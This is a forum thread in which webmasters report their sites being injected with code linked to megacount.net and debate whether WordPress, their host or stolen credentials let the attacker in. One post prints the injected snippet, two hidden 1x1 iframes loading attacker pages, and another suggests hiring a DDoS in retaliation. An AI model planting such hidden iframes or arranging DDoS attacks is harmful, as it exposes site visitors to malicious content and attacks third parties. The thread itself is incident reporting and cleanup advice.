HACKED! by megacount.net

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • escorpio
    King of Canada
    • Oct 2002
    • 23487

    #1

    HACKED! by megacount.net

    Anybody else having a problem with this russian motherfucker?
    Unvaxxed, still alive.
  • Martin3
    Confirmed User
    • Oct 2005
    • 1529

    #2
    yeah, was a recent thread in another forum with the same site
    264-543-302

    Comment

    • dissipate
      The Dirty Frenchman
      • Nov 2005
      • 8904

      #3
      Most adult servers lack even basic security measures. It's like shooting fish in a barrel.

      Comment

      • SinSational
        Confirmed User
        • Oct 2004
        • 1723

        #4
        http://www.gfy.com/showthread.php?t=660506&page=2

        http://www.gofuckyourself.com/showthread.php?t=661811

        ICQ# 273099174 - monthly specials - 2 Month Free Credit on All Plans - 100% Referrals - chris@ for details
        Virtual from $14.95/month, Dedicated from $149.95/month
        Dual-Core Xeon > 1000GB @ $149.95 | 1500GB @ $169.95 | 10Mbps @ $269.95

        Comment

        • Georgio
          Confirmed User
          • Sep 2006
          • 101

          #5
          Originally posted by dissipate
          Most adult servers lack even basic security measures. It's like shooting fish in a barrel.

          Yeah I know what u mean....
          Looking for excellent live and/or video content for your memberzone, without upsell?
          email:[email protected], icq:406677433, phone:+420-731448309, Or visit xxxtreams.com



          24/7 live girls, starting at 99,- / Month EVERYONE GETS A FREE BONUS PRODUCT!!!

          Comment

          • escorpio
            King of Canada
            • Oct 2002
            • 23487

            #6
            Originally posted by dissipate
            Most adult servers lack even basic security measures. It's like shooting fish in a barrel.
            I've found that out the hard way this past week.
            Unvaxxed, still alive.

            Comment

            • Verbal
              Confirmed User
              • Dec 2001
              • 3420

              #7
              Do you use Webair?

              Comment

              • boldy
                Macdaddy coder
                • Feb 2002
                • 2806

                #8
                One of my servers got it too ..
                MacDaddy Coder.

                Comment

                • escorpio
                  King of Canada
                  • Oct 2002
                  • 23487

                  #9
                  Originally posted by Verbal
                  Do you use Webair?
                  Yes, webair virtual.
                  Unvaxxed, still alive.

                  Comment

                  • escorpio
                    King of Canada
                    • Oct 2002
                    • 23487

                    #10
                    thank you
                    Unvaxxed, still alive.

                    Comment

                    • killerkay
                      Confirmed User
                      • Mar 2005
                      • 1482

                      #11
                      damn sucks man


                      $$$ UP TO 5$ PER FREE SIGNUP! $$$

                      Comment

                      • killerkay
                        Confirmed User
                        • Mar 2005
                        • 1482

                        #12
                        double post er


                        $$$ UP TO 5$ PER FREE SIGNUP! $$$

                        Comment

                        • Verbal
                          Confirmed User
                          • Dec 2001
                          • 3420

                          #13
                          Originally posted by escorpio
                          Yes, webair virtual.
                          I've been going back and forth with them and they want me to update ALL of the scripts for my sites ... a list about a mile long.

                          I'm seriously considering switching hosts. There must be something they can or do. The damn thing keeps coming back everyday. First it was uniqcount

                          Comment

                          • Klen
                            • Aug 2006
                            • 32235

                            #14
                            Try dwhs,they update their servers same moment when exploit or some holle goes out.

                            Comment

                            • escorpio
                              King of Canada
                              • Oct 2002
                              • 23487

                              #15
                              Originally posted by Verbal
                              I've been going back and forth with them and they want me to update ALL of the scripts for my sites ... a list about a mile long.

                              I'm seriously considering switching hosts. There must be something they can or do. The damn thing keeps coming back everyday. First it was uniqcount
                              Same story here. I'm switching now and it's going to be a big fucking pain in the ass.
                              Unvaxxed, still alive.

                              Comment

                              • Devilporn
                                Confirmed User
                                • Apr 2004
                                • 676

                                #16
                                Does someone know if it has anything to do with Wordpress?

                                TASTY DOLLARS Solo Girls | Hardcore Teens | Milfs
                                Need a good upsell for your members area? Check our TastyFreeFeeds
                                Contact me: ICQ: 323729438 | E-mail: hubert at tastydollars.com

                                Comment

                                • Gillespie
                                  Confirmed User
                                  • Aug 2006
                                  • 1391

                                  #17
                                  How are they getting in? Please post your /var/log/messages
                                  Blue Design Studios
                                  My choice for web design.
                                  Click this to see why.


                                  Get a REAL host. Try JaguarPC.

                                  294-659-259

                                  Comment

                                  • boldy
                                    Macdaddy coder
                                    • Feb 2002
                                    • 2806

                                    #18
                                    For me they just walked in using a ssh account. No failures or anything, 1 guess and they were in. I passed this account to 1 person only. I'll investigate more before i start drama
                                    MacDaddy Coder.

                                    Comment

                                    • emthree
                                      Dialer Kingpin
                                      • Jun 2003
                                      • 10816

                                      #19
                                      Drama time. I ALSO HAVE BEEN "HACKED" by megacount.net
                                      It's on a webair virtual account. I ONLY RECENTLY installed wordpress onto this domain, less than a week ago.

                                      Sell Patches & Pills

                                      Comment

                                      • emthree
                                        Dialer Kingpin
                                        • Jun 2003
                                        • 10816

                                        #20
                                        Someone get webair in here.

                                        Sell Patches & Pills

                                        Comment

                                        • madawgz
                                          8.8.8.8
                                          • Mar 2006
                                          • 30509

                                          #21
                                          hire someone to ddos him...2c

                                          not me ;)
                                          TAEMDLRMSKRJIXMRLSMRJ.

                                          Comment

                                          • Devilporn
                                            Confirmed User
                                            • Apr 2004
                                            • 676

                                            #22
                                            Originally posted by emthree
                                            Someone get webair in here.
                                            Contact them directly, you'll have better results

                                            TASTY DOLLARS Solo Girls | Hardcore Teens | Milfs
                                            Need a good upsell for your members area? Check our TastyFreeFeeds
                                            Contact me: ICQ: 323729438 | E-mail: hubert at tastydollars.com

                                            Comment

                                            • emthree
                                              Dialer Kingpin
                                              • Jun 2003
                                              • 10816

                                              #23
                                              Question to the people who got hacked: Do you guys have ABP installed?

                                              Sell Patches & Pills

                                              Comment

                                              • Dveron
                                                Confirmed User
                                                • Dec 2002
                                                • 2794

                                                #24
                                                Sounds like Webair need to update their shit
                                                Adult Comics Club - Updated Bi-Daily. 60% Recurring Payouts. Exclusive Comic Content.

                                                Comment

                                                • emthree
                                                  Dialer Kingpin
                                                  • Jun 2003
                                                  • 10816

                                                  #25
                                                  Originally posted by Devilporn
                                                  Contact them directly, you'll have better results
                                                  Not really. I've seen the chat log with RobV.
                                                  This is something effecting a lot of their customers. They need to address it publicly.

                                                  Sell Patches & Pills

                                                  Comment

                                                  • JOHNNY_BUTTHOLES
                                                    Confirmed User
                                                    • Jun 2006
                                                    • 146

                                                    #26
                                                    it's all over my sites. two wordpress blogs i noticed first. but then i noticed it on regular sites with no scripts.

                                                    i'm on realitychecknetworks NOT webair.

                                                    Comment

                                                    • Devilporn
                                                      Confirmed User
                                                      • Apr 2004
                                                      • 676

                                                      #27
                                                      Originally posted by emthree
                                                      Not really. I've seen the chat log with RobV.
                                                      This is something effecting a lot of their customers. They need to address it publicly.
                                                      You still have nothing to lose contacting them directly to take care of your own case...that's what we did today to get our own tgps fixed.

                                                      TASTY DOLLARS Solo Girls | Hardcore Teens | Milfs
                                                      Need a good upsell for your members area? Check our TastyFreeFeeds
                                                      Contact me: ICQ: 323729438 | E-mail: hubert at tastydollars.com

                                                      Comment

                                                      • emthree
                                                        Dialer Kingpin
                                                        • Jun 2003
                                                        • 10816

                                                        #28
                                                        This is pretty crazy. Does this mean the person has full access to our ftp files?
                                                        My sites are setup to use phpinclude to attatch the footer(s) onto my pages. This person found both my footer .html files and inserted the code into both. WTF?

                                                        I was going to upgrade to a webair dedicated for these sites too. I guess I have to look elsewhere now.

                                                        Sell Patches & Pills

                                                        Comment

                                                        • emthree
                                                          Dialer Kingpin
                                                          • Jun 2003
                                                          • 10816

                                                          #29
                                                          PHP Code:
                                                          <iframe src='http://megacount.net/adv/new.php?adv=167' width=1 height=1></iframe> 
                                                          <iframe src='http://megacount.net/adv/167/new.php' width=1 height=1></iframe> 
                                                          

                                                          Sell Patches & Pills

                                                          Comment

                                                          • Superterrorizer
                                                            Confirmed User
                                                            • Sep 2003
                                                            • 509

                                                            #30
                                                            Originally posted by Verbal
                                                            I've been going back and forth with them and they want me to update ALL of the scripts for my sites ... a list about a mile long.

                                                            I'm seriously considering switching hosts. There must be something they can or do. The damn thing keeps coming back everyday. First it was uniqcount

                                                            You are going to switch hosts because you didn't keep your scripts up to date and your out dated insecure scripts are being exploited? Unless that service is part of your contract or SLA it's YOUR responsibility to keep your scripts up to date, not your hosts.

                                                            While many potential security threats both known and unknown can be blocked, many cannot. If your server gets hacked via an exploit in the OS or an application (apache, php, mysql, etc) then it's your hosts fault (Unless you are unmanaged/colo). If one of your sites gets hacked/defaced due to you not keeping your scripts up to date, it's your fault.


                                                            Switching hosts isn't going to magically update all your scripts and fix your security problems.

                                                            Comment

                                                            • JOHNNY_BUTTHOLES
                                                              Confirmed User
                                                              • Jun 2006
                                                              • 146

                                                              #31
                                                              Originally posted by Superterrorizer
                                                              You are going to switch hosts because you didn't keep your scripts up to date and your out dated insecure scripts are being exploited? Unless that service is part of your contract or SLA it's YOUR responsibility to keep your scripts up to date, not your hosts.

                                                              While many potential security threats both known and unknown can be blocked, many cannot. If your server gets hacked via an exploit in the OS or an application (apache, php, mysql, etc) then it's your hosts fault (Unless you are unmanaged/colo). If one of your sites gets hacked/defaced due to you not keeping your scripts up to date, it's your fault.


                                                              Switching hosts isn't going to magically update all your scripts and fix your security problems.
                                                              this thing hit two of my wordpress sites that are running the very latest version. the other sites are not running any scripts. it attached itself to a regular footer that spanned by site.

                                                              Comment

                                                              • emthree
                                                                Dialer Kingpin
                                                                • Jun 2003
                                                                • 10816

                                                                #32
                                                                Originally posted by Superterrorizer
                                                                You are going to switch hosts because you didn't keep your scripts up to date and your out dated insecure scripts are being exploited? Unless that service is part of your contract or SLA it's YOUR responsibility to keep your scripts up to date, not your hosts.

                                                                While many potential security threats both known and unknown can be blocked, many cannot. If your server gets hacked via an exploit in the OS or an application (apache, php, mysql, etc) then it's your hosts fault (Unless you are unmanaged/colo). If one of your sites gets hacked/defaced due to you not keeping your scripts up to date, it's your fault.


                                                                Switching hosts isn't going to magically update all your scripts and fix your security problems.
                                                                I agree with you. However I believe the problem is webair itself.
                                                                I only added wordpress onto this site less than a week ago. It is using the latest version of WP and it was installed in a SUBFolder. My SUBFolders with wp were not compromised, it was my site's index.

                                                                Sell Patches & Pills

                                                                Comment

                                                                • emthree
                                                                  Dialer Kingpin
                                                                  • Jun 2003
                                                                  • 10816

                                                                  #33
                                                                  Question: are you guys running google analytics?
                                                                  It inserted itself right below my analytics code.

                                                                  Sell Patches & Pills

                                                                  Comment

                                                                  • JOHNNY_BUTTHOLES
                                                                    Confirmed User
                                                                    • Jun 2006
                                                                    • 146

                                                                    #34
                                                                    Originally posted by emthree
                                                                    Question: are you guys running google analytics?
                                                                    It inserted itself right below my analytics code.
                                                                    nope. this thing is installing itself on regular PHP files.

                                                                    Comment

                                                                    • HunkyLuke
                                                                      Virgin by request ;)
                                                                      • Feb 2002
                                                                      • 1924

                                                                      #35
                                                                      Originally posted by escorpio
                                                                      Same story here. I'm switching now and it's going to be a big fucking pain in the ass.
                                                                      switching hosts does NOT have to be painful as long as your new host is knowledgeable and is willing to help you out. Generally speaking, we set aside 1 full day to help clients by doing content moves, re-jigging scripts/htaccess files/etc with new path info, setting up and importing databases, recreating mail accounts, etc...

                                                                      good luck with your new choice, whoever they may be!

                                                                      cheers,
                                                                      Luke

                                                                      Comment

                                                                      • bigalownz
                                                                        Confirmed User
                                                                        • Aug 2005
                                                                        • 1657

                                                                        #36
                                                                        i got the same problem on one of my other sites

                                                                        its with revsharehosting and i got nothing on the site at all

                                                                        just a blank page
                                                                        $100 free credit for all hosting needs

                                                                        Comment

                                                                        • marketsmart
                                                                          HOMICIDAL TROLL KILLER
                                                                          • Dec 2004
                                                                          • 20419

                                                                          #37
                                                                          webair should be protecting you, unless its software you use on your site thats not owned by webair

                                                                          Comment

                                                                          • emthree
                                                                            Dialer Kingpin
                                                                            • Jun 2003
                                                                            • 10816

                                                                            #38
                                                                            BUMP - Did anyone contact wordpress?

                                                                            Sell Patches & Pills

                                                                            Comment

                                                                            • emthree
                                                                              Dialer Kingpin
                                                                              • Jun 2003
                                                                              • 10816

                                                                              #39
                                                                              Originally posted by bigalownz
                                                                              i got the same problem on one of my other sites

                                                                              its with revsharehosting and i got nothing on the site at all

                                                                              just a blank page
                                                                              Did/do you have wordpress installed on that site?

                                                                              Sell Patches & Pills

                                                                              Comment

                                                                              • JOHNNY_BUTTHOLES
                                                                                Confirmed User
                                                                                • Jun 2006
                                                                                • 146

                                                                                #40
                                                                                Originally posted by emthree
                                                                                Did/do you have wordpress installed on that site?
                                                                                you have to go though every one of your files and look for the iframe code. delete it and change the permissions to read only. i had to do this with every one of my sites today

                                                                                Comment

                                                                                • DateDoc
                                                                                  Outside looking in.
                                                                                  • Feb 2005
                                                                                  • 14243

                                                                                  #41
                                                                                  not just a wordpress issue: http://www.gfy.com/showthread.php?t=662468

                                                                                  Comment

                                                                                  • RobV
                                                                                    Confirmed User
                                                                                    • Oct 2005
                                                                                    • 111

                                                                                    #42
                                                                                    Originally posted by emthree
                                                                                    Not really. I've seen the chat log with RobV.
                                                                                    This is something effecting a lot of their customers. They need to address it publicly.
                                                                                    Webair and I are still bouncing emails. They haven't notified me of anything changed or any issues they see with my site.

                                                                                    The most recent email I recieved from them just said:
                                                                                    ########## Begin Message ##########

                                                                                    Are you sure ALL version of wordpress were updated BEFORE this last occured. Even if 1 site was running an older copy, other sites could have easily been modified since they're on the same account. Please advise.

                                                                                    Thanks,

                                                                                    And for the ........blah time I just had to answer, YES.

                                                                                    Ill keep anyone who is interested updated.
                                                                                    ICQ: 619221

                                                                                    Comment

                                                                                    • emthree
                                                                                      Dialer Kingpin
                                                                                      • Jun 2003
                                                                                      • 10816

                                                                                      #43
                                                                                      I spoke to them earlier. Since i've ONLY been running the newest version of WP on that virtual account, they say it must be an unpatched hole. We need to take it up with WP.

                                                                                      Sell Patches & Pills

                                                                                      Comment

                                                                                      • Gillespie
                                                                                        Confirmed User
                                                                                        • Aug 2006
                                                                                        • 1391

                                                                                        #44
                                                                                        Are you absolutely sure that they're getting in through WP? I've looked at their forums and didn't see a single hacked thread in the first two pages.
                                                                                        Blue Design Studios
                                                                                        My choice for web design.
                                                                                        Click this to see why.


                                                                                        Get a REAL host. Try JaguarPC.

                                                                                        294-659-259

                                                                                        Comment

                                                                                        • JOHNNY_BUTTHOLES
                                                                                          Confirmed User
                                                                                          • Jun 2006
                                                                                          • 146

                                                                                          #45
                                                                                          Originally posted by emthree
                                                                                          I spoke to them earlier. Since i've ONLY been running the newest version of WP on that virtual account, they say it must be an unpatched hole. We need to take it up with WP.
                                                                                          have you gone through all of your template files to see if the iframe code is on there?

                                                                                          Comment

                                                                                          • emthree
                                                                                            Dialer Kingpin
                                                                                            • Jun 2003
                                                                                            • 10816

                                                                                            #46
                                                                                            Originally posted by Gillespie
                                                                                            Are you absolutely sure that they're getting in through WP? I've looked at their forums and didn't see a single hacked thread in the first two pages.
                                                                                            That's the same thing I said to the tech. I checked the forums and google before I contacted them. He insists that it's a WP Hole. He says it shows nothing on my logs. I dont know who to believe.

                                                                                            Sell Patches & Pills

                                                                                            Comment

                                                                                            • Gillespie
                                                                                              Confirmed User
                                                                                              • Aug 2006
                                                                                              • 1391

                                                                                              #47
                                                                                              Do you have access to your /var/log/messages file?
                                                                                              Blue Design Studios
                                                                                              My choice for web design.
                                                                                              Click this to see why.


                                                                                              Get a REAL host. Try JaguarPC.

                                                                                              294-659-259

                                                                                              Comment

                                                                                              • emthree
                                                                                                Dialer Kingpin
                                                                                                • Jun 2003
                                                                                                • 10816

                                                                                                #48
                                                                                                Originally posted by JOHNNY_BUTTHOLES
                                                                                                have you gone through all of your template files to see if the iframe code is on there?
                                                                                                Yes, it was inserted into both of my footer files.
                                                                                                bottom1.html and bottom2.html

                                                                                                Sell Patches & Pills

                                                                                                Comment

                                                                                                • RevSand
                                                                                                  Confirmed User
                                                                                                  • Oct 2003
                                                                                                  • 8151

                                                                                                  #49
                                                                                                  This does not seem to be a webair OR wordpress issue since I also have been hit and do not use either...


                                                                                                  BadBitchesGoodWeed


                                                                                                  Hire me for all your video shooting needs!!
                                                                                                  Skype = RevSandx

                                                                                                  Comment

                                                                                                  • chaze
                                                                                                    Confirmed User
                                                                                                    • Aug 2002
                                                                                                    • 9774

                                                                                                    #50
                                                                                                    There is several ways a account can be hacked, If it's web air then other accounts would be hacked and the server would be taken offline. Once a server is hacked from root it's toast.

                                                                                                    They couldn't risk running it if it was the server.

                                                                                                    Most likly some php somewhere on your site, maybe even with your pasword.

                                                                                                    I would love to tell you otherwise and to switch over to us but php is a hackers playground and has to be carefully watched.

                                                                                                    On the other hand there is additional security to detour hackers like removing telnet and trace route whois details. Makeing apache look like it's not running from a basic ping and ect.. brute force protection might help too..
                                                                                                    Like the desert needs the rain
                                                                                                    We do fully manged WordPress, VPS, and Servers. Adult Host Pro https://adulthostpro.com/ Since 2001

                                                                                                    Comment

                                                                                                    Working...